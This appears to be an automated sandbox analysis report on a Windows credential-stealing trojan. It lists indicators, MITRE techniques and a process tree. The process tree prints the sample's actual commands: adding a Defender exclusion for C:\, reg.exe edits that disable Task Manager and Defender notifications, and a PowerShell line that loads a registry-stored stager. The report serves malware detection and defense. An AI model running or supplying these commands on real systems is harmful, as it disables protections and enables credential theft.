7f22ddaed36bd116459789fee0315812dcc68c99bcd908d54ddaa2f0e6df47b2

Analysis

max time kernel
90s
max time network
158s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
16/03/2024, 00:53

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

ccb0a2417311ee020462fb12ea0997c8.exe
Size

3.8MB
MD5

ccb0a2417311ee020462fb12ea0997c8
SHA1

3e353cc170d074b39969c5b072a683816fbe90e5
SHA256

7f22ddaed36bd116459789fee0315812dcc68c99bcd908d54ddaa2f0e6df47b2
SHA512

298dc356cbfae40cb6d554b9d059dd02fd16d971aac28f84f34c75466070de106d2032e47cbc8ebbf37c3ceb73267fd6b4ebfc757121409763ab9fc74f645abe
SSDEEP

98304:hhfMbhvRDp0/EbYb1Ts7AEA6Ri5np/FOCM3YhHT2JQ3gYU:hhAhlu/EbylsMV6M/NPMIhz+B

Score

10^/10

discovery evasion exploit spyware stealer trojan upx

Malware Config

Signatures

Modifies Windows Defender notification settings 3 TTPs 6 IoCs

evasion trojan

Windows Service

T1543.003

Modify Registry

T1112

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 1668 created 420	1668	powershell.EXE	5
PID 1904 created 420	1904	powershell.EXE	5

NirSoft WebBrowserPassView 2 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral1/memory/3008-68-0x000000001B530000-0x000000001B872000-memory.dmp	WebBrowserPassView
behavioral1/files/0x0006000000016601-488.dat	WebBrowserPassView

Nirsoft 4 IoCs

resource	yara_rule
behavioral1/memory/3008-68-0x000000001B530000-0x000000001B872000-memory.dmp	Nirsoft
behavioral1/files/0x0006000000016601-488.dat	Nirsoft
behavioral1/files/0x00060000000162cb-675.dat	Nirsoft
behavioral1/files/0x0006000000016584-784.dat	Nirsoft

Disables Task Manager via registry modification
evasion

Possible privilege escalation attempt 4 IoCs

exploit

pid	Process
2344	icacls.exe
1228	takeown.exe
2324	icacls.exe
1100	takeown.exe

Executes dropped EXE 12 IoCs

pid	Process
2160	$77main2.exe
2852	$77Redownloader.exe
2544	$77Stellacy.exe
2592	$77STLR.exe
3008	RtkBtManServ.exe
2992	Install.exe
1768	$77Stellacy.exe
2272	snuvcdsm.exe
2264	winhlp32.exe
1988	splwow64.exe
2500	hh.exe
2668	xwizard.exe

Loads dropped DLL 3 IoCs

pid	Process
2028	ccb0a2417311ee020462fb12ea0997c8.exe
2028	ccb0a2417311ee020462fb12ea0997c8.exe
2592	$77STLR.exe

Modifies file permissions 1 TTPs 4 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2344	icacls.exe
1228	takeown.exe
2324	icacls.exe
1100	takeown.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0006000000016252-625.dat	upx
behavioral1/files/0x000600000001643c-664.dat	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
9	discord.com
10	discord.com
14	discord.com
16	discord.com
17	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
2	ip-api.com
7	api64.ipify.org
8	api64.ipify.org

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\Recovery	ReAgentc.exe
File opened for modification	C:\Windows\system32\Recovery\ReAgent.xml	ReAgentc.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1668 set thread context of 2524	1668	powershell.EXE	65
PID 1904 set thread context of 2904	1904	powershell.EXE	72

Drops file in Windows directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Tasks\$77svc64.job	svchost.exe
File opened for modification	C:\Windows\appcompat\programs\RecentFileCache.bcf	svchost.exe
File opened for modification	C:\Windows\Tasks\$77svc32.job	svchost.exe
File created	C:\Windows\Tasks\$77svc32.job	Install.exe
File opened for modification	C:\Windows\Tasks\$77svc32.job	Install.exe
File created	C:\Windows\Tasks\$77svc64.job	Install.exe
File opened for modification	C:\Windows\Tasks\$77svc64.job	Install.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2128	schtasks.exe
440	schtasks.exe
1072	schtasks.exe
1008	schtasks.exe

Delays execution with timeout.exe 4 IoCs

evasion

pid	Process
1896	timeout.exe
792	timeout.exe
1100	timeout.exe
2360	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
2432	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 70d1bb903c77da01	powershell.EXE

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	RtkBtManServ.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	RtkBtManServ.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e4030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	RtkBtManServ.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec5290f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae474040000000100000010000000acb694a59c17e0d791529bb19706a6e420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	RtkBtManServ.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 8 IoCs

pid	Process
2852	$77Redownloader.exe
2592	$77STLR.exe
2992	Install.exe
2272	snuvcdsm.exe
2264	winhlp32.exe
1988	splwow64.exe
2500	hh.exe
2668	xwizard.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2628	powershell.exe
1668	powershell.EXE
1668	powershell.EXE
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
3008	RtkBtManServ.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
1904	powershell.EXE
2524	dllhost.exe
2524	dllhost.exe
3008	RtkBtManServ.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe
2524	dllhost.exe

Suspicious use of AdjustPrivilegeToken 26 IoCs

description	pid	Process
Token: SeDebugPrivilege	2628	powershell.exe
Token: SeDebugPrivilege	2544	$77Stellacy.exe
Token: SeDebugPrivilege	3008	RtkBtManServ.exe
Token: SeDebugPrivilege	1668	powershell.EXE
Token: SeDebugPrivilege	1668	powershell.EXE
Token: SeDebugPrivilege	2524	dllhost.exe
Token: SeDebugPrivilege	1904	powershell.EXE
Token: SeAssignPrimaryTokenPrivilege	828	svchost.exe
Token: SeIncreaseQuotaPrivilege	828	svchost.exe
Token: SeSecurityPrivilege	828	svchost.exe
Token: SeTakeOwnershipPrivilege	828	svchost.exe
Token: SeLoadDriverPrivilege	828	svchost.exe
Token: SeSystemtimePrivilege	828	svchost.exe
Token: SeBackupPrivilege	828	svchost.exe
Token: SeRestorePrivilege	828	svchost.exe
Token: SeShutdownPrivilege	828	svchost.exe
Token: SeSystemEnvironmentPrivilege	828	svchost.exe
Token: SeUndockPrivilege	828	svchost.exe
Token: SeManageVolumePrivilege	828	svchost.exe
Token: SeAuditPrivilege	288	svchost.exe
Token: SeAuditPrivilege	828	svchost.exe
Token: SeAuditPrivilege	828	svchost.exe
Token: SeDebugPrivilege	1904	powershell.EXE
Token: SeDebugPrivilege	2904	dllhost.exe
Token: SeTakeOwnershipPrivilege	1228	takeown.exe
Token: SeTakeOwnershipPrivilege	1100	takeown.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2852	$77Redownloader.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2028	ccb0a2417311ee020462fb12ea0997c8.exe
2544	$77Stellacy.exe
2288	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2028 wrote to memory of 2160	2028	ccb0a2417311ee020462fb12ea0997c8.exe	28
PID 2028 wrote to memory of 2160	2028	ccb0a2417311ee020462fb12ea0997c8.exe	28
PID 2028 wrote to memory of 2160	2028	ccb0a2417311ee020462fb12ea0997c8.exe	28
PID 2028 wrote to memory of 2160	2028	ccb0a2417311ee020462fb12ea0997c8.exe	28
PID 2160 wrote to memory of 2980	2160	$77main2.exe	29
PID 2160 wrote to memory of 2980	2160	$77main2.exe	29
PID 2160 wrote to memory of 2980	2160	$77main2.exe	29
PID 2160 wrote to memory of 2980	2160	$77main2.exe	29
PID 2980 wrote to memory of 2628	2980	cmd.exe	31
PID 2980 wrote to memory of 2628	2980	cmd.exe	31
PID 2980 wrote to memory of 2628	2980	cmd.exe	31
PID 2980 wrote to memory of 2384	2980	cmd.exe	32
PID 2980 wrote to memory of 2384	2980	cmd.exe	32
PID 2980 wrote to memory of 2384	2980	cmd.exe	32
PID 2980 wrote to memory of 2740	2980	cmd.exe	33
PID 2980 wrote to memory of 2740	2980	cmd.exe	33
PID 2980 wrote to memory of 2740	2980	cmd.exe	33
PID 2980 wrote to memory of 2852	2980	cmd.exe	34
PID 2980 wrote to memory of 2852	2980	cmd.exe	34
PID 2980 wrote to memory of 2852	2980	cmd.exe	34
PID 2980 wrote to memory of 2852	2980	cmd.exe	34
PID 2980 wrote to memory of 2420	2980	cmd.exe	35
PID 2980 wrote to memory of 2420	2980	cmd.exe	35
PID 2980 wrote to memory of 2420	2980	cmd.exe	35
PID 2980 wrote to memory of 2428	2980	cmd.exe	36
PID 2980 wrote to memory of 2428	2980	cmd.exe	36
PID 2980 wrote to memory of 2428	2980	cmd.exe	36
PID 2980 wrote to memory of 2284	2980	cmd.exe	37
PID 2980 wrote to memory of 2284	2980	cmd.exe	37
PID 2980 wrote to memory of 2284	2980	cmd.exe	37
PID 2980 wrote to memory of 2836	2980	cmd.exe	38
PID 2980 wrote to memory of 2836	2980	cmd.exe	38
PID 2980 wrote to memory of 2836	2980	cmd.exe	38
PID 2980 wrote to memory of 924	2980	cmd.exe	39
PID 2980 wrote to memory of 924	2980	cmd.exe	39
PID 2980 wrote to memory of 924	2980	cmd.exe	39
PID 2980 wrote to memory of 2916	2980	cmd.exe	40
PID 2980 wrote to memory of 2916	2980	cmd.exe	40
PID 2980 wrote to memory of 2916	2980	cmd.exe	40
PID 2980 wrote to memory of 3064	2980	cmd.exe	41
PID 2980 wrote to memory of 3064	2980	cmd.exe	41
PID 2980 wrote to memory of 3064	2980	cmd.exe	41
PID 2980 wrote to memory of 2012	2980	cmd.exe	42
PID 2980 wrote to memory of 2012	2980	cmd.exe	42
PID 2980 wrote to memory of 2012	2980	cmd.exe	42
PID 2980 wrote to memory of 2844	2980	cmd.exe	43
PID 2980 wrote to memory of 2844	2980	cmd.exe	43
PID 2980 wrote to memory of 2844	2980	cmd.exe	43
PID 2980 wrote to memory of 2340	2980	cmd.exe	44
PID 2980 wrote to memory of 2340	2980	cmd.exe	44
PID 2980 wrote to memory of 2340	2980	cmd.exe	44
PID 2980 wrote to memory of 1896	2980	cmd.exe	45
PID 2980 wrote to memory of 1896	2980	cmd.exe	45
PID 2980 wrote to memory of 1896	2980	cmd.exe	45
PID 2980 wrote to memory of 2544	2980	cmd.exe	46
PID 2980 wrote to memory of 2544	2980	cmd.exe	46
PID 2980 wrote to memory of 2544	2980	cmd.exe	46
PID 2980 wrote to memory of 2592	2980	cmd.exe	47
PID 2980 wrote to memory of 2592	2980	cmd.exe	47
PID 2980 wrote to memory of 2592	2980	cmd.exe	47
PID 2980 wrote to memory of 2592	2980	cmd.exe	47
PID 2980 wrote to memory of 2128	2980	cmd.exe	48
PID 2980 wrote to memory of 2128	2980	cmd.exe	48
PID 2980 wrote to memory of 2128	2980	cmd.exe	48

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:420
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{c21befe9-ceed-4a71-95e9-680b47c1872e}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2524
- C:\Windows\SysWOW64\dllhost.exe
  C:\Windows\SysWOW64\dllhost.exe /Processid:{3bb0ace7-a1b2-4335-9946-7bb32eb2c089}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2904

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:468
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  PID:596
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe -Embedding
    3⤵
    PID:1884
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
    3⤵
    PID:1476
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:664
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  PID:748
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  2⤵
  PID:800
- - C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    3⤵
    PID:1156
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs
  2⤵
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  PID:828
- - C:\Windows\system32\taskeng.exe
    taskeng.exe {617D0B9B-201F-457C-97F6-E88610F3C66C} S-1-5-18:NT AUTHORITY\System:Service:
    3⤵
    PID:1124
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1668
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1904
- - C:\Windows\system32\taskeng.exe
    taskeng.exe {ADF13112-23C4-4894-938E-B47F325AB803} S-1-5-21-778096762-2241304387-192235952-1000:AYFLYVMK\Admin:Interactive:[1]
    3⤵
    PID:1916
  - - C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
      C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
      4⤵
      Executes dropped EXE
      PID:1768
  - - C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
      C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
      4⤵
      PID:2564
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService
  2⤵
  PID:984
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k NetworkService
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:288
- C:\Windows\System32\spoolsv.exe
  C:\Windows\System32\spoolsv.exe
  2⤵
  PID:240
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  2⤵
  PID:1060
- C:\Windows\system32\taskhost.exe
  "taskhost.exe"
  2⤵
  PID:1084
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  2⤵
  PID:2092
- C:\Windows\system32\sppsvc.exe
  C:\Windows\system32\sppsvc.exe
  2⤵
  PID:2792

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:484

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:492

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1220
- C:\Users\Admin\AppData\Local\Temp\ccb0a2417311ee020462fb12ea0997c8.exe
  "C:\Users\Admin\AppData\Local\Temp\ccb0a2417311ee020462fb12ea0997c8.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2028
- - C:\Users\$77main2.exe
    "C:\Users\$77main2.exe" 0
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2160
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\90CB.tmp\90CC.tmp\90CD.bat C:\Users\$77main2.exe 0"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2980
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:\' -Force
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2628
    - - C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:2384
    - - C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:2740
    - - C:\Users\$77Redownloader.exe
        
        "C:\Users\$77Redownloader.exe" -o"C:\Users\Admin\AppData\Local\Microsoft\Windows" -y
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        Suspicious use of FindShellTrayWindow
        
        PID:2852
    - - C:\Windows\system32\reg.exe
        
        Reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
        5⤵
        Modifies Windows Defender notification settings
        
        PID:2420
    - - C:\Windows\system32\reg.exe
        
        Reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
        5⤵
        Modifies Windows Defender notification settings
        
        PID:2428
    - - C:\Windows\system32\reg.exe
        
        Reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
        5⤵
        Modifies Windows Defender notification settings
        
        PID:2284
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatIdDefaultAction" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:2836
    - - C:\Windows\system32\reg.exe
        
